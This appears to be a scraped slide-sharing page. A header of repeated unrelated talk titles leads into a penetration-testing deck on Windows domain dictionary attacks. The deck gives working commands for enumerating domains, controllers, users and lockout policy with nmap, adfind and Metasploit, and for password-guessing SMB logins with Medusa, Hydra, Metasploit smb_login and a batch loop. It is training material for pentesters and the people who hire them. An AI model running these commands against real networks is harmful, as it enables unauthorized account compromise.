"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users",  Kevin Goedecke"Scaling RAG Applications to serve millions of users",  Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
 
From Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMsFrom Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMs
 
Demystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through StorytellingDemystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through Storytelling
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
 
What is an RPA CoE? Session 2 – CoE Roles
What is an RPA CoE?  Session 2 – CoE RolesWhat is an RPA CoE?  Session 2 – CoE Roles
What is an RPA CoE? Session 2 – CoE Roles
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 

Introduction to Windows Dictionary Attacks

  • 1. Introduction to Windows Dictionary Attacks Author: Scott Sutherland
  • 2. Who am I? Scott Sutherland • Security Consultant @ NetSPI • Over 10 years of consulting experience • Security researcher: Blogs, white papers, tools etc
  • 3. Presentation Goals • Identify the value of dictionary attacks • Provide new penetration testers with a safe approach to Windows dictionary attacks • Provide security professionals with questions they should be asking their contractors
  • 4. Before we begin… Dictionary Attack Brute Force Attack
  • 5. Why dictionary attacks? What are the goals? • Identify accounts configured with weak or default passwords – “It’s human nature” • Use accounts as entry points during penetration tests What’s the impact? • Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data • User impersonation
  • 6. Are There Alternatives? Yes. Approaches typically includes: • Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper • Dumping clear text passwords from interactive sessions with Mimikatz
  • 7. With Alternatives be Covered? No.
  • 8. Dictionary Attacks: Process Overview Windows Dictionary Attack Process 1. Identify domains 2. Enumerate domain controllers 3. Enumerate domain users 4. Enumerate domain lockout policy 5. Create a dictionary 6. Perform Attack
  • 9. Identify Domains: Methods Unauthenticated Methods • DHCP Information • NetBIOS Queries • DNS Queries • Sniffing Network Traffic • Review RDP drop down lists Authenticated Methods • Review the output of the SET command for “USERDNSDOMAIN” • Review the registry for the default domain
  • 10. Identify Domains: Tools Method Tools Auth DHCP Info IPCONFIG No NetBIOS Queries NETSTAT –A <IP> No DNS Queries nmap -sL <IP Range> -oA output_rnds ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output No Sniffing Wireshark (GUI) + Filter for browser traffic Network Miner (GUI) Etherape (GUI) No RDP Drop Down nmap –sS –PN –p3389 <IP Range> Then visit with RDP client No
  • 11. Enumerate DCs: Methods Unauthenticated Methods • DNS Queries • RPC Queries • Port Scanning • NetBIOS Scanning Authenticated Methods • NET GROUP commands • LDAP Queries
  • 12. Enumerate DCs: Tools Methods Tools Auth DNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain> No RPC Queries NLTEST /DCLIST <domain> FindPDC <domain> <request count> No Port Scanning NMAP –sS –p389,636 –PN <IP Range> No NetBIOS Scanning FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT –A %i No NET GROUP Command Net group “Domain Controllers” /domain Yes LDAP Queries LDAP Administrator (GUI Tool) Hyena (GUI Tool) adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” | gawk -F ” ” “{print $2}” | sort | uniq Yes & No
  • 13. Enumerate Domain Users: Methods Unauthenticated Methods • RPC Queries • SID Brute Forcing • SNMP Queries • LDAP Queries • Sharepoint Fuzzing Authenticated Methods • NET USER command • WMI commands
  • 14. Enumerate Domain Users: Tools 1 Methods Tools Auth RPC Endpoints dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt enum –N <ip> enum –U <ip> Yes & no SID Brute Forcing ruby c:metasploitmsf3msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt Getacct (GUI) Yes & no SNMP Queries ruby c:metasploitmsf3msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E Mibbrowser (GUI) SNMP Walk Yes & no
  • 15. Enumerate Domain Users: Tools 2 Methods Tools Auth LDAP Queries adfind -b DC=<victim>,DC=<com> -f “objectcategory=user” -gc | grep -i “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk -F ” ” “{print $1}”| sort > domain_users.txt Yes & no Sharepoint Fuzzing Fuzz parameters with BURP to enumerate domain users. Example URL below: https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] Yes & no NET USERS Command Net users /domain > domain_users.txt Yes WMI Commands wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt Yes
  • 16. Get Domain Lockout Policy: Methods Unauthenticated Methods • RPC Endpoints Authenticated Methods • NET ACCOUNTS Command What does it all mean? • Threshold, duration, and window Lockout threshold: 5 Lockout duration: 15 Lockout observation window : 15
  • 17. Get Domain Lockout Policy: Tools Methods Tools Auth RPC Queries Enum –P <IP Address> dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt Yes & No NET ACCOUNTS COMMAND NET ACCOUNTS YEs
  • 18. Create a Dictionary: Methods Classics Still Work • Blank • Username as password • password Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number> Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
  • 19. Create a Dictionary: Tools Dictionary URLs / Lists Classics Blank password Username as password password as password Formulas <Password><Number> <Companyname><Number> <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! Rockyou http://www.skullsecurity.org/wiki/index.php/Passwords FuzzDB http://code.google.com/p/fuzzdb/ https://github.com/rustyrobot/fuzzdb John the Ripper http://www.openwall.com/wordlists/
  • 20. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy • General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user • Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3 • Wait 5 to 10 minutes beyond the observation window
  • 21. Perform Dictionary Attack: Tools Tools Commands OS Medusa medusa -H hosts.txt -U users.txt -P passwords.txt - T 20 -t 10 -L -F -M smbnt Linux Bruter Easy to use GUI and not CLI that I know of. Windows Metasploit smb_login ruby c:metasploitmsf3msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E Windows and Linux Hydra hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb Windows and Linux Batch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) do net user <ip>IPC$ /user:<user> %a Windows
  • 22. Conclusions • There is more than one way to do everything! • Enumerate all available options • It’s easy to lockout accounts – respect the password policy  • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests